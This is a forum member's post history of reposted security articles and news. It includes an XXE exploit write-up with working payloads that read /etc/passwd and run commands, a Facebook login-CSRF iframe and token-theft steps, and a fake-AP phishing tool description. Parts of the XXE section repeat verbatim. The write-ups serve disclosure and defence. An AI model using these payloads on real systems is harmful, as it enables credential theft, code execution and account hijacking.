Everything posted by Nytro
-
Applying Artificial Intelligence to Nintendo Tetris

Abstract

In this article, I explore the deceptively simple mechanics of Nintendo Tetris. Afterwards, I describe how to build an AI that exploits them.

Table of Contents

Abstract
Table of Contents
Try It Yourself
About
Preliminaries
Download
Run
Configuration
The Mechanics of Nintendo Tetris
Representing Tetriminos
Rotating Tetriminos
Spawning Tetriminos
Picking Tetriminos
Shifting Tetriminos
Dropping Tetriminos
Slides and Spins
Level 30 and Beyond
Lines and Statistics
Coloring Tetriminos
Game Mode
Legal Screen
Demo
The Kill Screen
Endings
2 Player Versus
Music and Sound Effects
Play States and Render Modes
The Algorithm
Overview
Searching for Lock
Evaluation Function
Other Factors
AI Training
Java Version
About
Packages
AI Classes and Interfaces
Invoking the AI
Displaying the Playfield
Other Projects
Gamepad Version

Try It Yourself

About

For those lacking the persistence, patience and time necessary to master Nintendo Tetris, I created an AI to play it for you. Finally, you can experience level 30 and beyond. You can witness the score max out while the line, level and statistics counters wrap around indefinitely. Find out what colors appear in levels higher than any human has ever reached. Discover how long it can go.

Preliminaries

To run the AI, you'll need FCEUX, the all-in-one NES/Famicom emulator. The AI was developed for FCEUX 2.2.2, the most recent version at the time of this writing. You'll also need the Nintendo Tetris ROM file (USA version). Google might be able to help you track it down.

Download

Extract lua/NintendoTetrisAI.lua from this source zip.

Run

Start up FCEUX. From the menu bar, select File | Open ROM... In the Open File dialog box, select the Nintendo Tetris ROM file and press Open. The game will launch. From the menu bar, select File | Lua | New Lua Script Window... From the Lua Script window, enter the path to NintendoTetrisAI.lua or hit the Browse button to navigate to it. Finally, press Run. The Lua script will direct you to the first menu screen. Leave the game type as A-Type, but feel free to change the music using the arrow keys. On slower computers, the music may sound choppy; you might want to disable it completely. Press Start (Enter) to advance to the next menu screen. In the second menu, you can change the starting level using the arrow keys. Press Start to begin the game. The AI will take over from there. From the second menu screen, after you select the level, if you hold down gamepad button A (use Config | Input... to modify the keyboard mapping) and press Start, the resulting starting level will be 10 plus the selected value. The highest starting level is 19.

Article: Applying Artificial Intelligence to Nintendo Tetris
-
This is a project I started to learn C code. injdmp detects injected processes by searching for memory marked as RWX, DLLs loaded via the registry values AppInit_DLLs & AppCertDlls, dummy processes, and MZ headers in memory marked as . In the extra dir there is some code for detecting threads running in memory space marked as RWX. See the website for usage details. Disclaimer: Use at your own risk.
Owner: Alexander Hanel
Website: http://hooked-on-mne…
Size: 100.7 KB (download)
Source: https://bitbucket.org/Alexander_Hanel/injdmp
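Not part of injdmp itself, but a minimal Python sketch of one of the checks described above: listing what is registered under AppInit_DLLs and AppCertDlls, two registry locations that can force a DLL into other processes. The key paths are the standard Windows ones; run it on the machine you are inspecting and review the output by hand.

import winreg

# Registry locations whose values can cause DLLs to be loaded into other processes.

def dump_appinit_dlls():
    path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            data, _ = winreg.QueryValueEx(key, "AppInit_DLLs")
            print("AppInit_DLLs =", repr(data))
    except OSError as exc:
        print("Could not read AppInit_DLLs:", exc)

def dump_appcert_dlls():
    path = r"SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls"
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            i = 0
            while True:
                name, data, _ = winreg.EnumValue(key, i)   # every value is a candidate DLL path
                print(f"AppCertDlls\\{name} = {data!r}")
                i += 1
    except FileNotFoundError:
        print("AppCertDlls key not present")
    except OSError:
        pass  # no more values to enumerate

if __name__ == "__main__":
    dump_appinit_dlls()
    dump_appcert_dlls()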
-
Static Analysis by Elimination

Pavle Subotic (Uppsala University, Sweden), Andrew E. Santosa (Oracle Labs, Australia), and Bernhard Scholz (University of Sydney, Australia)

Abstract. In the past, elimination-based data flow analysis algorithms have been proposed as an alternative to iterative algorithms for solving dataflow problems. Elimination-based algorithms exhibit a better worst-case runtime performance than iterative algorithms. However, the implementation of elimination-based algorithms is more challenging and iterative algorithms have been sufficient for solving standard data-flow problems in compilers. For more generic abstract interpretation frameworks, it has not been explored whether elimination-based algorithms are useful. In this paper we show that elimination-based algorithms are useful for implementing abstract interpretation frameworks for low-level programming languages. We demonstrate the feasibility of our approach by a range analysis developed in the LLVM framework. We supplement this work by a range of experiments conducted through several test suites.

Download: http://user.it.uu.se/~pasu4571/bytecode13.pdf
-
Defending Against Tor-Using Malware, Part 1
11:48 pm (UTC-7) | by Jay Yaneza (Technical Support)

In the past few months, the Tor anonymity service has been in the news for various reasons. Perhaps most infamously, it was used by the now-shuttered Silk Road underground marketplace. We delved into the topic of the Deep Web in a white paper titled Deepweb and Cybercrime. In our 2014 predictions, we noted that cybercriminals would go deeper underground – and part of that would be using Tor in greater numbers. Cybercriminals are clearly not blind to the potential of Tor, and network administrators have to consider that Tor-using malware might show up on their network. How should they react to this development?

What's Tor, anyway?

Tor is designed to solve a fairly specific problem: to stop a man-in-the-middle (such as network administrators, ISPs, or even countries) from determining or blocking the sites that a user visits. How does it do this? Previously known as "The Onion Router", Tor is an implementation of the concept of onion routing, in which a number of nodes located on the Internet serve as relays for Internet traffic. A user who wants to use the Tor network would install a client on their machine. This client would contact a Tor directory server, where it gets a list of nodes. The user's Tor client would select a path for the network traffic via the various Tor nodes to the destination server. This path is meant to be difficult to follow. In addition, all traffic between nodes is encrypted. (More details about Tor may be found at the official website of the Tor project.)

In effect, this hides your identity (or at least, IP address) from the site you visited, as well as from any potential attackers inspecting your network traffic along the way. This is quite useful if you're a visitor who wants to cover your tracks or if, for some reason, the server that you're trying to connect to denies connections from your IP address. This can be done for both legitimate and illegitimate reasons. Unfortunately, this means that it can be, and already has been, used for malicious purposes.

How can it be used maliciously?

Malware can just as easily use Tor as anyone else. In the second half of 2013, we saw more malware making use of it to hide its network traffic. In September, we blogged about the Mevade malware, which downloaded a Tor component for backup command-and-control (C&C) communication. In October 2013, Dutch police arrested four persons behind the TorRAT malware, a malware family which also used Tor for its C&C communication. This malware family targeted the bank accounts of Dutch users, and investigation was difficult because of the use of underground crypting services to evade detection and the use of cryptocurrencies (like Bitcoin). In the last weeks of 2013, we saw a ransomware variant that called itself Cryptorbit and explicitly asked the victim to use the Tor Browser (a browser bundle pre-configured for Tor) when paying the ransom. (The name may have been inspired by the notorious CryptoLocker malware, which uses similar behavior.)

Figure 1. Warning from Tor-using ransomware

Earlier this month, we discussed several ZBOT samples that, in addition to using Tor for their C&C connection, also embed a 64-bit version "inside" the normal, 32-bit version.

Figure 2. Running 64-bit ZBOT malware

This particular malware runs perfectly in a 64-bit environment and is injected into the running svchost.exe process, as is typically the case with injected malware.
This increase in Tor-using malware means that network administrators may want to consider additional steps to be aware of Tor, how to spot its usage, and (if necessary) prevent its use. Illegitimate usage of Tor could result in various problems, ranging from circumvented IT policies to exfiltrated confidential information. We will discuss these potential steps in a succeeding blog post.
Source: Defending Against Tor-Using Malware, Part 1 | Security Intelligence Blog | Trend Micro
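One practical starting point for the "how to spot its usage" question above, sketched in Python rather than taken from the article: the Tor Project publishes a plain-text bulk list of exit-node addresses, and addresses seen in firewall or proxy logs can be compared against it. This catches traffic arriving from Tor; spotting clients connecting out to Tor would need the full relay consensus instead.

import urllib.request

# URL of the Tor Project's bulk exit list (one IP per line, '#' comments).
EXIT_LIST_URL = "https://check.torproject.org/torbulkexitlist"

def fetch_tor_exit_nodes():
    """Download the current set of Tor exit-node IP addresses."""
    with urllib.request.urlopen(EXIT_LIST_URL, timeout=30) as resp:
        text = resp.read().decode("utf-8", errors="replace")
    return {line.strip() for line in text.splitlines()
            if line.strip() and not line.startswith("#")}

def flag_tor_peers(observed_ips):
    """Return the observed peer IPs that are known Tor exit nodes."""
    exits = fetch_tor_exit_nodes()
    return sorted(ip for ip in observed_ips if ip in exits)

if __name__ == "__main__":
    # Placeholder IPs standing in for addresses pulled from firewall/proxy logs.
    print(flag_tor_peers({"203.0.113.7", "198.51.100.23"}))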
-
[h=2]PwnSTAR: Pwn SofT Ap scRipt[/h]
A bash script to launch a fake AP, configurable with a wide variety of attack options. It includes a number of index.html and server PHP scripts for sniffing and phishing, can act as a multi-client captive portal using PHP and iptables, and launches classic exploits such as evil-PDF.

Features:
- takes care of configuration of interfaces, MAC spoofing, airbase-ng and isc-dhcp-server
- steals WPA handshakes
- phishes email credentials
- serves webpages: supplied (e.g. hotspot, below) or provide your own
- sniffing with ferret and sslstrip
- adds a captive portal to the frontend of the fake AP
- assorted exploits
- de-auth with MDK3, aireplay-ng or airdrop-ng

Use your imagination, craft your own webpages, and have fun. You can download the PwnSTAR script from here and save it to your desktop.
Source: Hacking Articles | Raj Chandel's Blog: PwnSTAR: Pwn SofT Ap scRipt
-
Detecting Custom Memory Allocators in C Binaries

Xi Chen, Asia Slowinska, Herbert Bos (Vrije Universiteit Amsterdam, The Netherlands)

Abstract—Many reversing techniques for data structures rely on the knowledge of memory allocation routines. Typically, they interpose on the system's malloc and free functions, and track each chunk of memory thus allocated as a data structure. However, many performance-critical applications implement their own custom memory allocators. Examples include webservers, database management systems, and compilers like gcc and clang. As a result, current binary analysis techniques for tracking data structures fail on such binaries. We present MemBrush, a new tool to detect memory allocation and deallocation functions in stripped binaries with high accuracy. We evaluated the technique on a large number of real world applications that use custom memory allocators. As we show, we can furnish existing reversing tools with detailed information about the memory management API, and as a result perform an analysis of the actual application specific data structures designed by the programmer. Our system uses dynamic analysis and detects memory allocation and deallocation routines by searching for functions that comply with a set of generic characteristics of allocators and deallocators.

Download: http://www.cs.vu.nl/~herbertb/papers/membrush_wcre13.pdf
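The paper is the place to go for the actual detection algorithm; purely as an illustration of the general idea (watching runtime behaviour for functions that hand out distinct memory regions that are later released through one matching routine), here is a toy sketch over a hypothetical call trace. Nothing below is MemBrush code, and the trace format and threshold are invented.

from collections import defaultdict

# (function_name, returned_pointer) and (function_name, pointer_argument) events,
# as a dynamic tracer might record them. Values are made up for the example.
returns = [("pool_get", 0x1000), ("pool_get", 0x1040), ("pool_get", 0x1080)]
calls = [("pool_put", 0x1000), ("pool_put", 0x1040), ("log_write", 0x2000)]

def guess_allocator_pairs(returns, calls):
    produced = defaultdict(set)            # candidate allocator -> pointers it returned
    for fn, ptr in returns:
        produced[fn].add(ptr)
    consumed = defaultdict(lambda: defaultdict(int))   # allocator -> consumer -> hits
    for alloc, ptrs in produced.items():
        for fn, ptr in calls:
            if ptr in ptrs:
                consumed[alloc][fn] += 1
    pairs = []
    for alloc, consumers in consumed.items():
        best, hits = max(consumers.items(), key=lambda kv: kv[1])
        if hits >= 2:                      # crude threshold: most returned pointers end up here
            pairs.append((alloc, best))
    return pairs

print(guess_allocator_pairs(returns, calls))   # [('pool_get', 'pool_put')]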
-
Revisiting XXE and abusing protocols

Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After having a quick look at the output from the PoC and rereading the vulnerability description, I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable.

The basic premise behind the vulnerability is that when a user authenticates with a site using OpenID, that site does a 'discovery' of the user's identity. To accomplish this, the server contacts the identity server specified by the user, downloads information regarding the identity endpoint and proceeds with authentication. There are two ways that a site may do this discovery process, either through HTML or a YADIS discovery. Now this is where it gets interesting. The HTML look-up is simply an HTML document with some meta information contained in the head tags:

<head>
<link rel="openid.server" href="http://www.example.com/myendpoint/" />
<link rel="openid2.provider" href="http://www.example.com/myendpoint/" />
</head>

Whereas the YADIS discovery relies on an XRDS document:

<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="http://openid.net/xmlns/1.0" xmlns="xri://$xrd*($v*2.0)">
<XRD>
<Service priority="0">
<Type>http://openid.net/signon/1.0</Type>
<URI>http://198.x.x.143:7804:/raw</URI>
<openid:Delegate>http://198.x.x.143:7804/delegate</openid:Delegate>
</Service>
</XRD>
</xrds:XRDS>

Now if you have been paying attention, the potential for exploitation should be jumping out at you. XRDS is simply XML and, as you may know, when XML is used there is a good chance that an application may be vulnerable to exploitation via XML External Entity (XXE) processing. XXE is explained by OWASP and I'm not going to delve into it here, but the basic premise behind it is that you can specify entities in the XML DTD that, when processed by an XML parser, get interpreted and 'executed'.

From the description given by Reginaldo, the vulnerability would be triggered by having the victim (Facebook) perform the YADIS discovery against a host we control. Our host would serve a tainted XRDS and our XXE would be triggered when the document was parsed by our victim. I whipped together a little PoC XRDS document that would cause the target host to request a second file (198.x.x.143:7806/success.txt) from a server under my control.
I ensured that the tainted XRDS was well-formed XML and would not cause the parser to fail (a quick check can be done by using XML Validation: XML Validation):

<?xml version="1.0" standalone="no"?>
<!DOCTYPE xrds:XRDS [
<!ELEMENT xrds:XRDS (XRD)>
<!ATTLIST xrds:XRDS xmlns:xrds CDATA "xri://$xrds">
<!ATTLIST xrds:XRDS xmlns:openid CDATA "http://openid.net/xmlns/1.0">
<!ATTLIST xrds:XRDS xmlns CDATA "xri://$xrd*($v*2.0)">
<!ELEMENT XRD (Service)*>
<!ELEMENT Service (Type,URI,openid:Delegate)>
<!ATTLIST Service priority CDATA "0">
<!ELEMENT Type (#PCDATA)>
<!ELEMENT URI (#PCDATA)>
<!ELEMENT openid:Delegate (#PCDATA)>
<!ENTITY a SYSTEM 'http://198.x.x.143:7806/success.txt'>
]>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="http://openid.net/xmlns/1.0" xmlns="xri://$xrd*($v*2.0)">
<XRD>
<Service priority="0">
<Type>http://openid.net/signon/1.0</Type>
<URI>http://198.x.x.143:7806/raw.xml</URI>
<openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate>
</Service>
<Service priority="0">
<Type>http://openid.net/signon/1.0</Type>
<URI>&a;</URI>
<openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate>
</Service>
</XRD>
</xrds:XRDS>

In our example the first <Service> element would parse correctly as a valid OpenID discovery, while the second <Service> element contains our XXE in the form of <URI>&a;</URI>. To test this we spun up a standard LAMP instance on DigitalOcean and followed the official installation instructions for a popular, open-source social platform that allowed for OpenID authentication. And then we tried out our PoC.

"Testing for successful XXE"

It worked! The initial YADIS discovery (orange) was done by our victim (107.x.x.117) and we served up our tainted XRDS document. This resulted in our victim requesting the success.txt file (red). So now we know we have some XXE going on. Next we needed to turn this into something a little more useful and emulate Reginaldo's Facebook success. A small modification was made to our XXE payload by changing the entity description for our 'a' entity as follows: <!ENTITY a SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>. This causes the PHP filter function to be applied to our input stream (the file read) before the text is rendered. This served two purposes: firstly, to ensure the file we were reading would not introduce any XML parsing errors, and secondly, to make the output a little more user friendly.

The first run with this modified payload didn't yield the expected results and simply resulted in the OpenID discovery being completed and my browser trying to download the identity file. After a quick look at the URL, I realised that OpenID expected the identity server to automatically instruct the user's browser to return to the site which initiated the OpenID discovery. As I'd just created a simple python web server with no intelligence, this wasn't happening. Fortunately this behaviour could be emulated by hitting 'back' in the browser and then initiating the OpenID discovery again. Instead of attempting a new discovery, the victim host would use the cached identity response (with our tainted XRDS) and the result was returned in the URL.

"The simple python webserver didn't obey the redirect instruction in the URL and the browser would be stuck at the downloaded identity file."

"Hitting the back button and requesting OpenID login again would result in our XXE data being displayed in the URL."

Finally, all we needed to do was base64 decode the result from the URL and we would have the contents of /etc/passwd.
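Not part of the original post: a small Python helper for that last step, pulling the base64 blob out of the returned URL and decoding it. The query-parameter name used here ("openid.identity") is an assumption; check where the leaked data actually lands in the callback URL on the platform you are testing.

import base64
from urllib.parse import urlparse, parse_qs

def decode_leaked_file(callback_url, param="openid.identity"):
    # The php://filter chain base64-encodes the target file before it is
    # reflected into the OpenID return URL; undo that here.
    query = parse_qs(urlparse(callback_url).query)
    blob = query.get(param, [""])[0]
    return base64.b64decode(blob).decode("utf-8", errors="replace")

if __name__ == "__main__":
    # "cm9vdDp4OjA6MDpyb290" decodes to "root:x:0:0:root" -- a short stand-in
    # for the much longer blob a real /etc/passwd read produces.
    url = "http://victim.example/openid/return?openid.identity=cm9vdDp4OjA6MDpyb290"
    print(decode_leaked_file(url))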
"The decoded base64 string yielded the contents of /etc/passwd" This left us with the ability to read *any* file on the filesystem, granted we knew the path and that the web server user had permissions to access that file. In the case of this particular platform, an interesting file to read would be config.php which yields the admin username+password as well as the mysql database credentials. The final trick was to try and turn this into RCE as was hinted in the Facebook disclosure. As the platform was written in PHP we could use the expect:// handler to execute code. <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded (PHP: Installation - Manual). Not too sure how often this is the case but other attempts at RCE haven't been too successful. Armed with our new XRDS document we reenact our steps from above and we end up with some code execution. "RCE - retrieving the current user id" And Boom goes the dynamite. This left us with the ability to read *any* file on the filesystem, granted we knew the path and that the web server user had permissions to access that file. In the case of this particular platform, an interesting file to read would be config.php which yields the admin username+password as well as the mysql database credentials. The final trick was to try and turn this into RCE as was hinted in the Facebook disclosure. As the platform was written in PHP we could use the expect:// handler to execute code. <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded (PHP: Installation - Manual). Not too sure how often this is the case but other attempts at RCE haven't been too successful. Armed with our new XRDS document we reenact our steps from above and we end up with some code execution. "RCE - retrieving the current user id" And Boom goes the dynamite. All in all a really fun vulnerability to play with and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP the following should be set when using the default XML parser: libxml_disable_entity_loader(true); A good document with PHP security tips can be found here: Injection Attacks — Survive The Deep End: PHP Security :: v1.0a1 ./et - See more at: SensePost Blog And Boom goes the dynamite. All in all a really fun vulnerability to play with and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP the following should be set when using the default XML parser: libxml_disable_entity_loader(true); A good document with PHP security tips can be found here: Injection Attacks — Survive The Deep End: PHP Security :: v1.0a1 Sursa: SensePost Blog
-
The World's Worst Penetration Test Report by #ScumbagPenTester "MySQL configured to allow connections from 127.0.0.1. Recommend configuration change to not allow remote connections." "Fixing the configuration will no longer allow evil connections by evil connection for configuration of server."
-
[h=3]Two "WontFix" vulnerabilities in Facebook Connect[/h]
TL;DR Every website with "Connect Facebook account and log in with it" is vulnerable to account hijacking. Every website relying on signed_request (for example the official JS SDK) is vulnerable to account takeover, as soon as an attacker finds a 302 redirect to another domain. I don't think these will be fixed, as I've heard from the Facebook team that it will break compatibility. I really wish they would fix it though; as you can see below, I feel these are serious issues. I understand the business reasons why they might choose so, but from my perspective, when you have to choose between security and compatibility, the former is the right bet. Let me quickly describe what these bugs are and how you can protect your websites.

CSRF on facebook.com login to hijack your identity.

It's a higher-level Most-Common-OAuth-Vulnerability (we attached the Attacker's Social Account to the Victim's Client Account), but here even Clients using "state" to prevent CSRF are vulnerable.

<iframe name="playground" src='data:text/html,<form id="genform" action="https://www.facebook.com/login.php" method="POST"><input type="hidden" name="email" value="homakov@gmail.com"><input type="hidden" name="pass" value="password"></form><script>genform.submit()</script>'></iframe>

FYI we need the data: trick to get rid of the Referer header; Facebook rejects requests with cross-domain Referers. This form logs the victim into an arbitrary account of the attacker's (even if the user is already logged in, the logout procedure is trivial). Now, for all OAuth flows, Facebook will respond with the Attacker's profile information and the Attacker's uid. Every website with "Connect your Facebook to main account to login faster" functionality is vulnerable to account hijacking, as long as an attacker can replace your identity on Facebook with his identity and connect his Facebook account to the victim's account on the website just by loading the CLIENT/fb/connect URL. Once again: even if we cannot inject our callback with our code because of state-protection, we can re-login the user to make Facebook do all the work for us! Almost all server-side libraries and implementations are "vulnerable" (they are not, it's Facebook who's vulnerable!): omniauth, django-social-auth, etc. And yeah, the official facebook-php-sdk. (By the way, I found 2 bugs in omniauth-facebook: state fixation, authentication bypass. Update if you haven't yet.)

Mitigation: require a CSRF token for adding a social connection. E.g. instead of /connect/facebook use /connect/facebook?authenticity_token=123qwe. It will make it impossible for an attacker to start the process by himself.

Facebook JS SDK and #signed_request

Because "redirect_uri" has been flexible on Connect since its creation, Facebook engineers made it a required parameter to obtain an "access_token" for an issued "code". If the code was issued for a different (spoofed) redirect_uri, the provider will respond with a mismatch error. signed_request is a special non-standard transport created by Facebook. It carries a "code" as well, but this code is issued for an empty redirect_uri = "". Furthermore, signed_request is sent in a #fragment, so it can be leaked easily with any 302 redirect to the attacker's domain. And guess what — the redirect can even be on a subdomain of our target! The attack surface gets so huge, no doubt you can find a redirecting endpoint on any big website. Basically, signed_request is exactly what the "code" flow is, but with leak protection turned off.
All you need is to steal the victim's signed_request with a redirect to your domain (slice it from location.hash), then open the Client website, put it in the fbsr_CLIENT_ID cookie and hit the client's authentication endpoint. Finally, you're logged in as the owner of that signed_request. It's just like when you steal username+password.

Mitigation: it's hard to get rid of all the redirects. For example, Facebook clients like SoundCloud, Songkick and Foursquare are at the same time OAuth providers too, so they have to be able to redirect to 3rd party websites. Each redirect to their "sub" clients is also a threat to leak Facebook's token. Well, you can try to add #_=_ to "kill" the fragment part. It's better to stop using signed_request (get rid of the JS SDK) and start using the (slightly more) secure code flow with the protections I mentioned above.

Conclusion

In my opinion I'd recommend not using Facebook Connect in critical applications (nor with any other OAuth provider). Perhaps it's a suitable quick login for a funny social game, but never for a website with important data. Use oldschool passwords instead. If you must use Facebook Connect, I recommend whitelisting your redirect_uri in the app's settings and requiring user interaction (clicking some button) to start adding a new connection. I really hope Facebook will change their mind, to stay a trustworthy identity provider.

Author: Egor Homakov on 10:27 PM
Source: Egor Homakov: Two "WontFix" vulnerabilities in Facebook Connect
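A sketch of the first mitigation suggested above (a CSRF token required to start the "connect your Facebook account" flow), written with Flask purely for illustration; the route names and session keys are placeholders, not anything from Facebook's SDK.

import secrets
from flask import Flask, session, request, abort

app = Flask(__name__)
app.secret_key = "change-me"   # placeholder; use a real secret in practice

@app.route("/settings")
def settings():
    # Embed a per-session token in the "Connect Facebook" link/button.
    token = session.setdefault("connect_csrf", secrets.token_urlsafe(32))
    return f'<a href="/connect/facebook?authenticity_token={token}">Connect Facebook</a>'

@app.route("/connect/facebook")
def connect_facebook():
    # An attacker cannot start the connect flow on the victim's behalf
    # without knowing this per-session token.
    if request.args.get("authenticity_token") != session.get("connect_csrf"):
        abort(403)
    # ... proceed with the normal OAuth redirect to Facebook ...
    return "Starting OAuth flow"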
-
Spy agencies are slurping personal data from leaky mobile apps
by Lisa Vaas on January 29, 2014

The US' National Security Agency (NSA) and its UK counterpart, GCHQ, have been honing their data-slurping technologies to suck up whatever they can get from leaky smartphones, the Guardian reported on Tuesday. Beyond device details, data shared over the internet by iOS and Android apps can include personal information such as age, gender, and location, while some apps share even more sensitive user information, such as sexual preference or whether a given user might be a swinger.

The Guardian, relying on top-secret documents handed over by whistleblower Edward Snowden, says that the spy guys are developing capabilities to milk this private information from apps as innocuous as the insanely popular Angry Birds game. Reporting in partnership with the New York Times and ProPublica, they revealed that the NSA and GCHQ have "extensive tools" ready to throw against iPhone, Android and other phone platforms.

The agencies also apparently think of Google Maps as a gold mine. The Guardian reports that one project involved intercepting Google Maps queries from smartphones to collect large volumes of location data. The newspaper quotes a 2008 document's gleeful assessment of the Google Maps work, in which it noted that:

"[I]t effectively means that anyone using Google Maps on a smartphone is working in support of a GCHQ system."

The documents suggest that, depending on how much information a user has provided in his or her profile on a given app, the agency could collect "almost every key detail of a user's life", the Guardian reports: home country, current location (through geolocation), age, gender, zip code, marital status - options included "single", "married", "divorced", "swinger" and more - income, ethnicity, sexual orientation, education level, and number of children.

Given how popular Angry Birds is, and given that the secret documents use it as a case study, some articles have hung Angry Birds in their headlinery - that's like finery, but with headlines instead of undies. But Angry Birds shouldn't be singled out as being in any way subverted or corrupted by the NSA or GCHQ. Angry Birds is, after all, just one of thousands of mobile apps, none of which has been indicted as complicit with, or data-raked by, the NSA or GCHQ - rather, the spying agencies are, as news reports say, simply tapping data as it flies across the network.

Rovio, the maker of Angry Birds, told the Guardian that it wasn't aware of any NSA or GCHQ programs looking to extract data from its apps' users. The newspaper quotes Saara Bergström, Rovio's VP of marketing and communications:

"Rovio doesn't have any previous knowledge of this matter, and have not been aware of such activity in third-party advertising networks. Nor do we have any involvement with the organisations you mentioned [NSA and GCHQ]."

The NSA's data sniffing is far from news, of course - the names PRISM and XKeyscore should ring some bells in that department. Much of the profile data in question isn't being nefariously pickpocketed from app users, at any rate. As Naked Security pointed out on Monday in honor of Data Privacy Day, many of us are willingly giving our personal data away. It's easy to see why: it's a heck of a lot more fun to have apps spill your beans, since in exchange we get linked to communities or get shiny doo-dads. All we have to do is fill out profiles with stuff they actually don't, really, need - birthdates, marital status, etc.
We can take back a big chunk of our privacy simply by refusing to hand over data, whether it's given in a profile or beamed out when we have WiFi and/or geolocation turned on. Cinching our data waistbands can be done with three simple steps, outlined by Naked Security in the Privacy Plan Diet. If you can live without "Find My iPad" or other such geolocation-dependent goodies, you can keep a lot of your data out of the hands of spies, marketers or other data busybodies.

But beyond information knowingly handed over in profiles, phone apps have a nasty habit of sharing more data than users may realize. Sometimes the holes come from software bugs, but then again, sometimes data leakage is an unintended consequence of users' own, deliberate actions, such as:

- Twitter users having geolocation turned on, using the word "home" in their tweets and, Presto! thereby potentially handing a nosy little application their home address.
- Soldiers snapping photos that smartphones then automatically geotag, giving the enemy their coordinates.
- Fugitives' locations - John McAfee comes to mind - babbled by a photo's location metadata, precise latitude, longitude, time and all.

Beyond bugs and deliberate leakage from probably-inattentive users is yet another category: apps that silently gulp data in the background while they're doing innocent-seeming things in the foreground, such as being a flashlight or a mobile app for kids.

There are issues with mobile privacy, and then too there's security. Specifically, phones have lagged behind websites in their use of encryption - witness, for example, the notable lack of security in banking apps. Why cast a hairy eyeball at privacy as it plays out in Angry Birds profile data when you've got iOS banking apps to worry about? Given recent research from Ariel Sanchez, a researcher at security assessment company IOActive, there's very little security indeed to be had there. Sanchez found that out of 40 iOS banking apps used by 60 banks in about 20 countries, 70% of the apps offered no support at all for two-factor authentication (2FA), and 40% of the apps weren't validating SSL certificates - in other words, they weren't able to notice bogus SSL certificates when accessing supposedly secure HTTPS traffic and couldn't, therefore, stop a theoretical man-in-the-middle attack.

What does this have to do with Angry Birds et al.? If the connection between the phones and the servers such apps were talking to had been well encrypted, then it's likely that the data they exchanged would have been unintelligible to anyone trying to read it on the wire. Should Angry Birds, or ads on Angry Birds, or the other apps in question, or the ads on those apps, have been using HTTPS or some form of encryption? Yes. But the lack of such security measures isn't, unfortunately, remarkable, as research including Sanchez's work on iOS banking apps makes clear.

Source: Spy agencies are slurping personal data from leaky mobile apps | Naked Security
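Not from the article: a minimal Python sketch of the certificate checking those banking apps were reportedly skipping. ssl.create_default_context() verifies the certificate chain and the hostname, so a bogus man-in-the-middle certificate makes the handshake fail instead of being silently accepted.

import socket
import ssl

def open_verified_tls(host, port=443):
    context = ssl.create_default_context()            # verifies chain and hostname
    context.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse legacy protocol versions
    sock = socket.create_connection((host, port), timeout=10)
    tls = context.wrap_socket(sock, server_hostname=host)
    print("Negotiated", tls.version(), "cipher", tls.cipher()[0])
    return tls

if __name__ == "__main__":
    open_verified_tls("example.com").close()
    # The weak apps effectively disabled these checks (verify_mode = CERT_NONE),
    # which is what lets a man-in-the-middle present any certificate it likes.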
-
SSL/TLS analysis of the Internet's top 1,000,000 websites
By Julien Vehent, Saturday, January 11, 2014, 00:32 - General - Permalink

It seems that evaluating different SSL/TLS configurations has become a hobby of mine. After publishing Server Side TLS back in October, my participation in discussions around cipher preferences, key sizes, elliptic curve security, etc. has significantly increased (ironically so, since the initial, naive goal of "Server Side TLS" was to reduce the amount of discussion on this very topic). More guides are being written on configuring SSL/TLS server side. One that is quickly gaining traction is Better Crypto, which we discussed quite a bit on the dev-tech-crypto mailing list. People are often passionate about these discussions (and I am no exception). But one item that keeps coming back is the will to kill deprecated ciphers as fast as possible, even if that means breaking connectivity for some users. I am absolutely against that, and still believe that it is best to keep backward compatibility for all users, even at the cost of maintaining RC4 or 3DES or 1024-bit DHE keys in our TLS servers. One question that came up recently on dev-tech-crypto is "can we remove RC4 from Firefox entirely?". One would think that, since Firefox supports all of these other ciphers (AES, AES-GCM, 3DES, Camellia, ...), surely we can remove RC4 without impacting users. But without numbers, it is not an easy decision to make. Challenge accepted: I took my cipherscan arsenal for a spin, and decided to scan the Internet.

Article: https://jve.linuxwall.info/blog/index.php?post/TLS_Survey
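A toy, single-host illustration of the kind of probing cipherscan automates (cipherscan itself drives the openssl CLI and walks the full suite list; this Python sketch only reports whatever the server picks against a default client):

import socket
import ssl

def negotiated_cipher(host, port=443):
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE   # survey use: we only care about the handshake
    with socket.create_connection((host, port), timeout=10) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            name, version, bits = tls.cipher()
            return version, name, bits

if __name__ == "__main__":
    print(negotiated_cipher("example.com"))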
-
SpyEye malware creator Aleksandr Panin pleads guilty
Graham Cluley | January 29, 2014 9:29 am

The primary developer of the notorious SpyEye banking malware has pleaded guilty to conspiracy to commit wire and bank fraud, in relation to his role in a cybercriminal campaign that has infected over 1.4 million computers worldwide. SpyEye, a variant of the Zeus banking Trojan, is used by criminal gangs to help them break into victims' online bank accounts and steal personally identifiable information. Sold on the criminal underground as a kit for between $1,000 and $8,500, hackers could take SpyEye and customise it for their own malicious purposes. Once computers have become infected by SpyEye, online criminals are able to remotely control them, logging keystrokes and stealing personal and financial data that is silently transmitted to servers under the hackers' control.

